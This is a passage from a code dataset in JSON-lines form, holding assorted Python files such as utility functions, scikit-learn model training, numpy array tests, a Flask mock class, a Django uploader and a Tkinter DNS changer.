greatest_number(digit):\n max = \"9\" * digit\n \n return int(max)\n\n# Function to check if it's a palindrome\ndef is_palindrome(palindrome):\n number = str(palindrome)\n reversed = number[::-1]\n return number == reversed\n\n# Function to get the factorial from the math module\ndef factorial(exponent):\n return math.factorial(exponent)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158152488","text":"#! /usr/bin/python3\n# coding=utf-8\n\nimport pymongo\nimport re\n\nCL = pymongo.MongoClient()\nDB = CL['ner-dict']\nC = DB.ents\n\n\ndef lookup(alias):\n # as regex search in mongo is very slow, do a phrase search in mongo\n # and then a regex search only on the results\n alias_for_phrase_search = '\\\"{}\\\"'.format(alias)\n res = C.find({\"$text\": {\"$search\": alias_for_phrase_search}})\n\n alias_for_regex_search = r'^{}$'.format(alias)\n try:\n regex_alias = re.compile(alias_for_regex_search)\n except:\n print(\"problem with: '{}'!\".format(alias))\n return []\n good_matches = []\n for r in res:\n if r['type'] == 'other':\n continue\n for a in r['aliases']:\n if regex_alias.match(a):\n good_matches.append(r)\n\n return good_matches\n\n\nif __name__ == \"__main__\":\n print(C.count())\n t = lookup(\"יונתן בן עוזיאל\")\n for r in t:\n print(r)\n","sub_path":"db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"247173836","text":"# Libaries \nfrom flask import Flask\n\n# - To make HTTP Requests\nimport requests \n\n\n\n\ndef CheckZipCodes():\n total =0\n url = \"https://mls.foreclosure.com/listing/search?lc=foreclosure&loc=\" + '08816'\n requestUrl = requests.get(url)\n requestText = requestUrl.text\n requestTextSplit = requestText.split('\\n')\n for lines in requestTextSplit:\n if lines[0:15].lower() == 'var markersdata':\n print(lines)\n\nCheckZipCodes()\n","sub_path":"StephenTesterRealEstate.py","file_name":"StephenTesterRealEstate.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"624702654","text":"# -----------------------------------\n# Tem Tamre\n# CMPT 103: Lab 2\n# Program Name: Lab 2 Assignments\n# -----------------------------------\n\n\n# Question 1: Fill in the blanks\n# a)\nfor i in range(20, 33, 3):\n print(i)\n# b)\nfor i in range(7, -2, -2):\n print(i)\n\n\n# Purpose: This function asks the user to enter 5 integers, calculates and\n# prints the average of these numbers, and prints the numbers entered that\n# are greater than the average\n# Parameters: None\n# Return: None\ndef calculate_average():\n integer_list = []\n total = 0\n while len(integer_list) < 5:\n user_input = int(input(\"Please enter an integer: \"))\n integer_list.append(user_input)\n for elem in integer_list:\n total += elem\n average = total / len(integer_list)\n\n print(\"\\nThe average is:\", average)\n print(\"The numbers greater than the average are:\")\n for elem in integer_list:\n if elem > average:\n print(elem, end=\"\\t\")\n\n\n# Purpose: This function takes an alphabetic string and prints out the number\n# of times each letter (upper- or lower-case) is in the string\n# Parameter: string - a string of only alphabetic characters\n# Return: None\ndef letter_counter(string):\n first_letters = []\n for letter in string:\n if letter.lower() not in first_letters:\n first_letters.append(letter.lower())\n for letter in first_letters:\n print(\"The letter\", letter, \"is in\", string,\n string.lower().count(letter), \"time(s)\")\n","sub_path":"labs/Lab2_TT.py","file_name":"Lab2_TT.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"164462058","text":"import json\nimport chardet\n\nnumbers = [1, 2, 3, 4, 5, 6]\n\nfilename = 'numbers.json'\nwith open(filename, 'w') as f_obj:\n json.dump(numbers, f_obj)\n\nfile_path = 'D:/Desktop/OneDrive/3GitHub/python_learn/file_test.txt'\nwith open(file_path) as file_object:\n contents = file_object.read()\n print(contents.rstrip())\n for line in file_object:\n print(line.rstrip())\n\nwith open(filename) as f_obj:\n numbers = json.load(f_obj)\n\nprint(numbers)\n\nf = open(\"D:/Desktop/OneDrive/3GitHub/python_learn/list.py\", \"r\", encoding=\"utf-8\")\ndata = f.read()\nprint(data)\nf.close()\n\n# result = chardet.detect(f)\n# print(result)\n#\n\nf = open('file_test.txt', 'w')\nf.write('\\ntest')\nf.write('\\ntest2')\n\nf.readline()\n\nf.close()\nf.readable()\n\n","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"642533215","text":"SEED = 69\r\n\r\nimport pandas as pd\r\nimport json\r\nimport pickle\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.metrics import accuracy_score\r\nimport utils\r\nimport numpy as np\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndef get_models():\r\n \"\"\"\r\n Returns a list of classification models to train\r\n :Input\r\n None\r\n :Returns\r\n baseModels - a dictionary of classification models\r\n \"\"\"\r\n baseModels = {}\r\n baseModels['LogisticRegression'] = LogisticRegression(n_jobs = -1)\r\n baseModels['DecisionTreeClassifier'] = DecisionTreeClassifier()\r\n baseModels['AdaBoostClassifier'] = AdaBoostClassifier()\r\n baseModels['GradientBoostingClassifier'] = GradientBoostingClassifier()\r\n baseModels['RandomForestClassifier'] = RandomForestClassifier(n_jobs = -1, n_estimators=200)\r\n baseModels['ExtraTreesClassifier'] = ExtraTreesClassifier(n_jobs = -1, n_estimators=200)\r\n baseModels['SupportVectorClassifier'] = SVC()\r\n baseModels['KNeighborsClassifier'] = KNeighborsClassifier(n_jobs = -1)\r\n baseModels['GaussianNB'] = GaussianNB()\r\n return baseModels\r\n\r\n\r\ndef train_and_evaluate_models(x_train, y_train, x_test, y_test, models):\r\n \"\"\"\r\n Returns a dictionary of trained models\r\n :Input\r\n x_train - independant variable to train model on\r\n y_train - dependant variable\r\n x_test - independant variable to test the model\r\n y_test - true labels used to test the model\r\n models - a ditionary containing objects of classification models\r\n :Returns\r\n models - the same dictionary of classification models after training\r\n \"\"\"\r\n print('****Traianing Models****')\r\n\r\n for name, _model in models.items():\r\n \r\n _model.fit(x_train, y_train)\r\n y_pred = _model.predict(x_test)\r\n score = accuracy_score(y_test, y_pred)\r\n print(name, score)\r\n return models\r\n\r\ndef score_models(x_train, y_train, models, num_folds = 5):\r\n \"\"\"\r\n Cross validates models using sklearn's StratifiedKFold\r\n :Input\r\n x_train - independant variable\r\n y_train - dependant variable\r\n models - ditionary containing objects of classification models indexed by name\r\n num_folds - integer denoting no of folds to use for cv\r\n :Returns\r\n scores - dictionary containing mean cross val score of the models\r\n \"\"\"\r\n print('****Cross Validating models****')\r\n scores = {}\r\n num_folds = 5\r\n\r\n for name, model in models.items():\r\n kfold = StratifiedKFold(n_splits=num_folds, random_state=SEED, shuffle = True)\r\n cv_results = cross_val_score(model, x_train, y_train, cv=kfold, scoring='accuracy', n_jobs = -1)\r\n msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\r\n print(msg)\r\n scores[name] = cv_results.mean()\r\n\r\n return scores\r\n\r\ndef save_models(models, path = \"models/\"):\r\n \"\"\"\r\n Saves models as pickle files\r\n\r\n :Input\r\n models - dictionary containing model trained objects\r\n\r\n :Returns:\r\n None\r\n \"\"\"\r\n print('****Saving Models****')\r\n for name, model in models.items():\r\n model_file = path + \"{0}.pkl\".format(name)\r\n\r\n with open(model_file, 'wb') as file:\r\n pickle.dump(model, file)\r\n print('****Saved Successfully****')\r\n\r\n#Opening config file to get the dataset path\r\nwith open('CONFIG.json') as config_file:\r\n CONFIG = json.load(config_file)\r\npath = CONFIG['raw_data_path']\r\n\r\n#Reading the dataset\r\ndata = pd.read_csv(path)\r\n\r\n#Getting training and test vaectors\r\nx_train, x_test, y_train, y_test = utils.preprocess_data(data, 0.10)\r\n\r\n#Getting models\r\nmodels = get_models()\r\n\r\n#Cross validating the models\r\nscores = score_models(x_train, y_train, models, num_folds = 5)\r\n#Training models\r\ntrained_models = train_and_evaluate_models(x_train, y_train, x_test, y_test, models)\r\nprint(trained_models['RandomForestClassifier'].predict(np.array([90,42,43,20.87974371,82.00274423,6.502985292000001,202.9355362]).reshape(1, -1)))\r\n#Saving models as pickle file\r\nsave_models(models)\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460276365","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EndpointRegistrationUpdateApiModel(Model):\n \"\"\"Endpoint registration update request.\n\n :param user: User authentication to change on the endpoint.\n :type user: ~azure-iiot-opc-registry.models.CredentialApiModel\n \"\"\"\n\n _attribute_map = {\n 'user': {'key': 'user', 'type': 'CredentialApiModel'},\n }\n\n def __init__(self, user=None):\n super(EndpointRegistrationUpdateApiModel, self).__init__()\n self.user = user\n","sub_path":"generated/python/azure-iiot-opc-registry/models/endpoint_registration_update_api_model.py","file_name":"endpoint_registration_update_api_model.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343394996","text":"#CS 101\n#Program 1\n#Alfred Harris\n#ajhyr9@mail.umkc.edu\n#Problem: \n# \tDetermine the total amount of pasta(in oz.)required for the large spaghetti \n#\tparty based on the number of attendees of varying type provided by the user.\n#Algorithm: \n#\t1. Prompt for user input for number of adults, number of students, and \n#\t\tnumber of children that will attend the large spaghetti party.\n# \t2. Convert user input for number of adults, number of students, and number of \n# \t\tchildren to integer data type\n# 3. Compute total amount of pasta needed for large spaghetti party \n# (where: Adult serving size of pasta is 8 ounces, Student serving size of \n# pasta is 12 ounces, Children serving size of pasta is 4 ounces, and \n# the Total Pasta required =(# of adults attending * adult serving size) +\n# (# of students attending * student serving size) + \n# (# of children attedning * child serving size) \n\n\n\"\"\"Prompt for user input and assign that input to variable, and convert given \ninput to integer data type\"\"\" \n\nadults_attending = input (\"How many adults are attending your spaghetti party?\")\nadults_attending_int = int(adults_attending)\n\nstudents_attending = input (\"How many students are attending your spaghetti party?\")\nstudents_attending_int = int(students_attending)\n\nchildren_attending = input (\"How many children are attending your spaghetti party?\")\nchildren_attending_int = int(children_attending)\n\n# assigns serving sizes of pasta for each type person to variable \nadult_serving_size_int = 8\nstudent_serving_size_int = 12\nchild_serving_size_int = 4\n\n# compute and print to console the total amount of pasta needed for the party \ntotal_pasta_required_int = ((adults_attending_int * adult_serving_size_int)+\n (students_attending_int * student_serving_size_int)+ \n (children_attending_int * child_serving_size_int ))\nprint (\"You will need a total of\",total_pasta_required_int, \\\n \"ounces of pasta for your large spaghetti party!\")\n","sub_path":"Program_1.py","file_name":"Program_1.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274792851","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom contextlib import contextmanager\n\nfrom flask import Response\nfrom flask import abort as _abort\n\nfrom ...utils import pyv\n\nif pyv.IS_PYTHON_2:\n import urlparse\nelse:\n from urllib import parse\n\n\nDEFAULT_STATUS_CODE = 200\nDEFAULT_HTTP_METHOD = 'GET'\n\nABORT_ATTRIBUTE_NAME = '__abort__'\n\n\ndef on_file(mock, fp):\n mock.__on_file__(fp)\n\n\ndef abort(mock, status_code):\n setattr(mock, ABORT_ATTRIBUTE_NAME, status_code)\n\n\ndef parse_for_meta(string):\n http_method, status_code, url_rule = [\n item.strip() for item in string.split(' ')\n ]\n return http_method, status_code, url_rule\n\n\ndef parse_for_header(string):\n key = string[:string.index(':'):]\n value = string[string.index(':') + 1:]\n\n return key.strip(), value.strip()\n\n\nclass BaseMock(object):\n\n __headers__ = None\n __mime_type__ = None\n __content_type__ = None\n\n HEADER_REGEXP = re.compile(r'[A-z -]+:.*\\s')\n META_REGEXP = re.compile(r'[A-Z]{3,6}\\s[0-9]{3}\\s\\/.*\\s')\n\n def __init__(self,\n endpoint,\n url_rule,\n body=None,\n headers=None,\n mime_type=None,\n status_code=None,\n http_method=None,\n content_type=None):\n self._body = body or ''\n self._url_rule = url_rule\n self._endpoint = endpoint\n self._mime_type = mime_type\n self._headers = headers or {}\n self._content_type = content_type\n self._status_code = status_code or DEFAULT_STATUS_CODE\n self._http_method = http_method or DEFAULT_HTTP_METHOD\n\n if self.__headers__:\n for k, v in self.__headers__:\n self._headers.setdefault(k, v)\n\n def __call__(self, *args, **kwargs):\n abort_code = getattr(\n self, ABORT_ATTRIBUTE_NAME, None,\n )\n\n if abort_code:\n _abort(abort_code)\n\n return self.make_response()\n\n def __repr__(self):\n return ''.format(\n self.url_rule, self.http_method, self.endpoint,\n )\n\n def __eq__(self, other):\n compare = (\n self.url_rule == other.url_rule,\n self.http_method == other.http_method,\n )\n return all(compare)\n\n def __on_file__(self, fp):\n body = []\n\n for line in fp.readlines():\n try:\n line = line.decode('utf-8')\n except AttributeError: # please python 3 :)\n pass\n\n if line.startswith('#'): # pass comment line\n continue\n\n if self.HEADER_REGEXP.search(line):\n key, value = parse_for_header(line)\n self._headers[key] = value\n elif self.META_REGEXP.search(line):\n http_method, status_code, url_rule = parse_for_meta(line)\n self._url_rule = url_rule\n self._http_method = http_method\n self._status_code = status_code\n else:\n # Other line as body item\n body.append(line)\n\n self._body = u''.join(body)\n\n @classmethod\n def from_file(cls, file_path):\n with open(file_path, 'r') as fp:\n mock = cls(file_path, None)\n on_file(mock, fp)\n return mock\n\n @property\n def body(self):\n return self._body\n\n @property\n def headers(self):\n return self._headers\n\n @property\n def endpoint(self):\n return self._endpoint\n\n @property\n def url_rule(self):\n return self._url_rule\n\n @property\n def params(self):\n if pyv.IS_PYTHON_2:\n return urlparse.parse_qs(\n urlparse.urlparse(self.url_rule).query,\n )\n return parse.parse_qs(\n parse.urlparse(self._url_rule).query,\n )\n\n @property\n def status_code(self):\n return int(self._status_code)\n\n @property\n def http_method(self):\n return self._http_method.upper()\n\n @property\n def mime_type(self):\n return self._mime_type or self.__mime_type__\n\n @property\n def content_type(self):\n return self._content_type or self.__content_type__\n\n @contextmanager\n def as_(self, mock):\n assert self == mock\n\n endpoint = self._endpoint\n self._endpoint = mock.endpoint\n try:\n yield\n finally:\n self._endpoint = endpoint\n\n def make_response(self):\n return Response(\n self.body,\n headers=self.headers,\n mimetype=self.mime_type,\n status=self.status_code,\n content_type=self.content_type,\n )\n","sub_path":"seismograph/ext/mocker/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"57933517","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests of array utility functions.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal as ae\nfrom pytest import raises\n\nfrom ..array import (_unique,\n _normalize,\n _index_of,\n _as_array,\n _as_tuple,\n chunk_bounds,\n excerpts,\n data_chunk,\n get_excerpts,\n PartialArray,\n _partial_shape,\n _range_from_slice,\n _pad,\n _concatenate_virtual_arrays,\n )\nfrom ...io.mock.artificial import artificial_spike_clusters\n\n\n#------------------------------------------------------------------------------\n# Test utility functions\n#------------------------------------------------------------------------------\n\ndef test_range_from_slice():\n \"\"\"Test '_range_from_slice'.\"\"\"\n\n class _SliceTest(object):\n \"\"\"Utility class to make it more convenient to test slice objects.\"\"\"\n def __init__(self, **kwargs):\n self._kwargs = kwargs\n\n def __getitem__(self, item):\n if isinstance(item, slice):\n return _range_from_slice(item, **self._kwargs)\n\n with raises(ValueError):\n _SliceTest()[:]\n with raises(ValueError):\n _SliceTest()[1:]\n ae(_SliceTest()[:5], [0, 1, 2, 3, 4])\n ae(_SliceTest()[1:5], [1, 2, 3, 4])\n\n with raises(ValueError):\n _SliceTest()[::2]\n with raises(ValueError):\n _SliceTest()[1::2]\n ae(_SliceTest()[1:5:2], [1, 3])\n\n with raises(ValueError):\n _SliceTest(start=0)[:]\n with raises(ValueError):\n _SliceTest(start=1)[:]\n with raises(ValueError):\n _SliceTest(step=2)[:]\n\n ae(_SliceTest(stop=5)[:], [0, 1, 2, 3, 4])\n ae(_SliceTest(start=1, stop=5)[:], [1, 2, 3, 4])\n ae(_SliceTest(stop=5)[1:], [1, 2, 3, 4])\n ae(_SliceTest(start=1)[:5], [1, 2, 3, 4])\n ae(_SliceTest(start=1, step=2)[:5], [1, 3])\n ae(_SliceTest(start=1)[:5:2], [1, 3])\n\n ae(_SliceTest(length=5)[:], [0, 1, 2, 3, 4])\n with raises(ValueError):\n _SliceTest(length=5)[:3]\n ae(_SliceTest(length=5)[:10], [0, 1, 2, 3, 4])\n ae(_SliceTest(length=5)[:5], [0, 1, 2, 3, 4])\n ae(_SliceTest(start=1, length=5)[:], [1, 2, 3, 4, 5])\n ae(_SliceTest(start=1, length=5)[:6], [1, 2, 3, 4, 5])\n with raises(ValueError):\n _SliceTest(start=1, length=5)[:4]\n ae(_SliceTest(start=1, step=2, stop=5)[:], [1, 3])\n ae(_SliceTest(start=1, stop=5)[::2], [1, 3])\n ae(_SliceTest(stop=5)[1::2], [1, 3])\n\n\ndef test_pad():\n arr = np.random.rand(10, 3)\n\n ae(_pad(arr, 0, 'right'), arr[:0, :])\n ae(_pad(arr, 3, 'right'), arr[:3, :])\n ae(_pad(arr, 9), arr[:9, :])\n ae(_pad(arr, 10), arr)\n\n ae(_pad(arr, 12, 'right')[:10, :], arr)\n ae(_pad(arr, 12)[10:, :], np.zeros((2, 3)))\n\n ae(_pad(arr, 0, 'left'), arr[:0, :])\n ae(_pad(arr, 3, 'left'), arr[7:, :])\n ae(_pad(arr, 9, 'left'), arr[1:, :])\n ae(_pad(arr, 10, 'left'), arr)\n\n ae(_pad(arr, 12, 'left')[2:, :], arr)\n ae(_pad(arr, 12, 'left')[:2, :], np.zeros((2, 3)))\n\n with raises(ValueError):\n _pad(arr, -1)\n\n\ndef test_unique():\n \"\"\"Test _unique() function\"\"\"\n _unique([])\n\n n_spikes = 1000\n n_clusters = 10\n spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)\n ae(_unique(spike_clusters), np.arange(n_clusters))\n\n\ndef test_normalize():\n \"\"\"Test _normalize() function.\"\"\"\n\n n_channels = 10\n positions = 1 + 2 * np.random.randn(n_channels, 2)\n\n # Keep ration is False.\n positions_n = _normalize(positions)\n\n x_min, y_min = positions_n.min(axis=0)\n x_max, y_max = positions_n.max(axis=0)\n\n np.allclose(x_min, 0.)\n np.allclose(x_max, 1.)\n np.allclose(y_min, 0.)\n np.allclose(y_max, 1.)\n\n # Keep ratio is True.\n positions_n = _normalize(positions, keep_ratio=True)\n\n x_min, y_min = positions_n.min(axis=0)\n x_max, y_max = positions_n.max(axis=0)\n\n np.allclose(min(x_min, y_min), 0.)\n np.allclose(max(x_max, y_max), 1.)\n np.allclose(x_min + x_max, 1)\n np.allclose(y_min + y_max, 1)\n\n\ndef test_index_of():\n \"\"\"Test _index_of.\"\"\"\n arr = [36, 42, 42, 36, 36, 2, 42]\n lookup = _unique(arr)\n ae(_index_of(arr, lookup), [1, 2, 2, 1, 1, 0, 2])\n\n\ndef test_as_tuple():\n assert _as_tuple(3) == (3,)\n assert _as_tuple((3,)) == (3,)\n assert _as_tuple(None) is None\n assert _as_tuple((None,)) == (None,)\n assert _as_tuple((3, 4)) == (3, 4)\n assert _as_tuple([3]) == ([3], )\n assert _as_tuple([3, 4]) == ([3, 4], )\n\n\ndef test_as_array():\n ae(_as_array(3), [3])\n ae(_as_array([3]), [3])\n ae(_as_array(3.), [3.])\n ae(_as_array([3.]), [3.])\n\n with raises(ValueError):\n _as_array(map)\n\n\ndef test_concatenate_virtual_arrays():\n arr1 = np.random.rand(5, 2)\n arr2 = np.random.rand(4, 2)\n\n def _concat(*arrs):\n return np.concatenate(arrs, axis=0)\n\n # Single array.\n concat = _concatenate_virtual_arrays([arr1])\n ae(concat[:], arr1)\n ae(concat[1:], arr1[1:])\n ae(concat[:3], arr1[:3])\n ae(concat[1:4], arr1[1:4])\n\n # Two arrays.\n concat = _concatenate_virtual_arrays([arr1, arr2])\n # First array.\n ae(concat[1:], _concat(arr1[1:], arr2))\n ae(concat[:3], arr1[:3])\n ae(concat[1:4], arr1[1:4])\n # Second array.\n ae(concat[5:], arr2)\n ae(concat[6:], arr2[1:])\n ae(concat[5:8], arr2[:3])\n ae(concat[7:9], arr2[2:])\n ae(concat[7:12], arr2[2:])\n ae(concat[5:-1], arr2[:-1])\n # Both arrays.\n ae(concat[:], _concat(arr1, arr2))\n ae(concat[1:], _concat(arr1[1:], arr2))\n ae(concat[:-1], _concat(arr1, arr2[:-1]))\n ae(concat[:9], _concat(arr1, arr2))\n ae(concat[:10], _concat(arr1, arr2))\n ae(concat[:8], _concat(arr1, arr2[:-1]))\n ae(concat[1:7], _concat(arr1[1:], arr2[:-2]))\n ae(concat[4:7], _concat(arr1[4:], arr2[:-2]))\n\n\n#------------------------------------------------------------------------------\n# Test chunking\n#------------------------------------------------------------------------------\n\ndef test_chunk_bounds():\n chunks = chunk_bounds(200, 100, overlap=20)\n\n assert next(chunks) == (0, 100, 0, 90)\n assert next(chunks) == (80, 180, 90, 170)\n assert next(chunks) == (160, 200, 170, 200)\n\n\ndef test_chunk():\n data = np.random.randn(200, 4)\n chunks = chunk_bounds(data.shape[0], 100, overlap=20)\n\n with raises(ValueError):\n data_chunk(data, (0, 0, 0))\n\n assert data_chunk(data, (0, 0)).shape == (0, 4)\n\n # Chunk 1.\n ch = next(chunks)\n d = data_chunk(data, ch)\n d_o = data_chunk(data, ch, with_overlap=True)\n\n ae(d_o, data[0:100])\n ae(d, data[0:90])\n\n # Chunk 2.\n ch = next(chunks)\n d = data_chunk(data, ch)\n d_o = data_chunk(data, ch, with_overlap=True)\n\n ae(d_o, data[80:180])\n ae(d, data[90:170])\n\n\ndef test_excerpts_1():\n bounds = [(start, end) for (start, end) in excerpts(100,\n n_excerpts=3,\n excerpt_size=10)]\n assert bounds == [(0, 10), (45, 55), (90, 100)]\n\n\ndef test_excerpts_2():\n bounds = [(start, end) for (start, end) in excerpts(10,\n n_excerpts=3,\n excerpt_size=10)]\n assert bounds == [(0, 10)]\n\n\ndef test_get_excerpts():\n data = np.random.rand(100, 2)\n subdata = get_excerpts(data, n_excerpts=10, excerpt_size=5)\n assert subdata.shape == (50, 2)\n ae(subdata[:5, :], data[:5, :])\n ae(subdata[-5:, :], data[-10:-5, :])\n\n data = np.random.rand(10, 2)\n subdata = get_excerpts(data, n_excerpts=10, excerpt_size=5)\n ae(subdata, data)\n\n\n#------------------------------------------------------------------------------\n# Test PartialArray\n#------------------------------------------------------------------------------\n\ndef test_partial_shape():\n\n _partial_shape(None, ())\n _partial_shape((), None)\n _partial_shape((), ())\n _partial_shape(None, None)\n\n assert _partial_shape((5, 3), 1) == (5,)\n assert _partial_shape((5, 3), (1,)) == (5,)\n assert _partial_shape((5, 10, 2), 1) == (5, 10)\n with raises(ValueError):\n _partial_shape((5, 10, 2), (1, 2))\n assert _partial_shape((5, 10, 3), (1, 2)) == (5,)\n assert _partial_shape((5, 10, 3), (slice(None, None, None), 2)) == (5, 10)\n assert _partial_shape((5, 10, 3), (slice(1, None, None), 2)) == (5, 9)\n assert _partial_shape((5, 10, 3), (slice(1, 5, None), 2)) == (5, 4)\n assert _partial_shape((5, 10, 3), (slice(4, None, 3), 2)) == (5, 2)\n\n\ndef test_partial_array():\n # 2D array.\n arr = np.random.rand(5, 2)\n\n ae(PartialArray(arr)[:], arr)\n\n pa = PartialArray(arr, 1)\n assert pa.shape == (5,)\n ae(pa[0], arr[0, 1])\n ae(pa[0:2], arr[0:2, 1])\n ae(pa[[1, 2]], arr[[1, 2], 1])\n with raises(ValueError):\n pa[[1, 2], 0]\n\n # 3D array.\n arr = np.random.rand(5, 3, 2)\n\n pa = PartialArray(arr, (2, 1))\n assert pa.shape == (5,)\n ae(pa[0], arr[0, 2, 1])\n ae(pa[0:2], arr[0:2, 2, 1])\n ae(pa[[1, 2]], arr[[1, 2], 2, 1])\n with raises(ValueError):\n pa[[1, 2], 0]\n\n pa = PartialArray(arr, (1,))\n assert pa.shape == (5, 3)\n ae(pa[0, 2], arr[0, 2, 1])\n ae(pa[0:2, 1], arr[0:2, 1, 1])\n ae(pa[[1, 2], 0], arr[[1, 2], 0, 1])\n with raises(ValueError):\n pa[[1, 2]]\n\n # Slice and 3D.\n arr = np.random.rand(5, 10, 2)\n\n pa = PartialArray(arr, (slice(1, None, 3), 1))\n assert pa.shape == (5, 3)\n ae(pa[0], arr[0, 1::3, 1])\n ae(pa[0:2], arr[0:2, 1::3, 1])\n ae(pa[[1, 2]], arr[[1, 2], 1::3, 1])\n","sub_path":"phy/utils/tests/test_array.py","file_name":"test_array.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194648516","text":"# Basic file uploader app\nimport os\nfrom urllib import urlencode\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.core.cache import cache\nfrom django.utils import simplejson\nfrom forms.superuploader import SuperUploaderForm\nfrom handlers.upload import handle_file_upload\n\n\ndef superuploader(request):\n '''\n Handle file upload case\n '''\n if request.method == 'POST':\n form = SuperUploaderForm(request.POST, request.FILES) \n if form.is_valid():\n filename, filesize = handle_file_upload(request.FILES['file'])\n qargs = urlencode({ 'title': request.POST['title'], \n 'filename': filename,\n 'filesize': filesize,\n })\n redirect_url = ('/done/?{qargs}').format(qargs=qargs)\n return HttpResponseRedirect(redirect_url)\n else:\n form = SuperUploaderForm()\n\n return render_to_response('superuploader.tmpl', {'form': form,})\n\n\ndef done(request):\n filename = request.GET.get('filename')\n filesize = request.GET.get('filesize')\n return render_to_response('done.tmpl', {\n 'title': request.GET.get('title'),\n 'filename': filename, \n 'filesize': filesize, \n })\n\n\n\n","sub_path":"uploader/basic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"294490990","text":"#!/usr/bin/env python\n\nfrom gevent import monkey; monkey.patch_all()\n\nfrom pylib.wiring import gevent_zmq as zmq\nimport logging\n\nfrom lib import fetcherloop\nfrom pylib import conf, wiring\n\nlog = logging.getLogger(__name__)\n\ndef _parse_args():\n options, app_config = conf.parse_config()\n return app_config\n\ndef main():\n zmq_context = zmq.Context()\n \n config = _parse_args()\n \n opsecfetcher_out = wiring.Wire(\"collector_out\", zmq_context=zmq_context,\n conf_path=config.get('wiring_conf_path') or None)\n\n log.info('opsec fetcher starting..')\n fetcherloop.start(config, opsecfetcher_out)\n\nmain()\n","sub_path":"col/apps/opsec_fetcher/opsec_fetcher_old.py","file_name":"opsec_fetcher_old.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"139816818","text":"from Tkinter import *\nfrom subprocess import *\nimport ttk\n\nclass DNSChanger:\n\tdef __init__(self, root):\n\t\tself.configureGUI(root)\n\t\tself.clean()\n\t\tself.getNetworkInterfaces()\n\n\tdef log(self, error):\n\t\tself._log.insert(END, error)\n\n\tdef clean(self):\n\t\tself._progress[\"value\"] = 0\n\t\tself._log.delete(0.0, END)\n\t\troot.update()\n\n\tdef configureGUI(self, root):\n\t\troot.title('DNS Changer')\n\t\troot.resizable(0,0)\n\t\troot.geometry(\"500x600\")\n\n\t\tLabel(root, text=\"Network interfaces:\").pack()\n\n\t\tself._listbox = Listbox(root, width=30, height=10)\n\t\tself._listbox.pack()\n\n\t\tself._entry1 = Entry(root, width=30)\n\t\tself._entry1.insert(0, '8.8.8.8')\n\t\tself._entry1.pack()\n\n\t\tself._button1 = Button(root, text=\"Change DNS\", command=self.changeDNSCallback1)\n\t\tself._button1.pack()\n\n\t\tself._entry2 = Entry(root, width=30)\n\t\tself._entry2.pack()\n\t\tself._entry2.insert(0, '172.0.10.1')\n\n\t\tself._button2 = Button(root, text=\"Change DNS\", command=self.changeDNSCallback2)\n\t\tself._button2.pack()\n\n\t\tself._log = Text(root, width=120, height=25)\n\t\tself._log.pack()\n\n\t\tself._progress = ttk.Progressbar(root, orient =\"horizontal\",length = 500, mode =\"determinate\")\n\t\tself._progress.pack()\n\t\n\tdef getNetworkInterfaces(self):\n\t\tprocess = Popen('cmd', shell=True, stdin=PIPE, stdout=PIPE)\n\t\tout, err = process.communicate('ipconfig\\n')\n\t\tself._list = []\n\n\t\tfor line in out.split('\\n'):\n\t\t\tif line[0] != ' ' and ' adapter ' in line and 'Tunnel ' not in line:\n\t\t\t\titem = 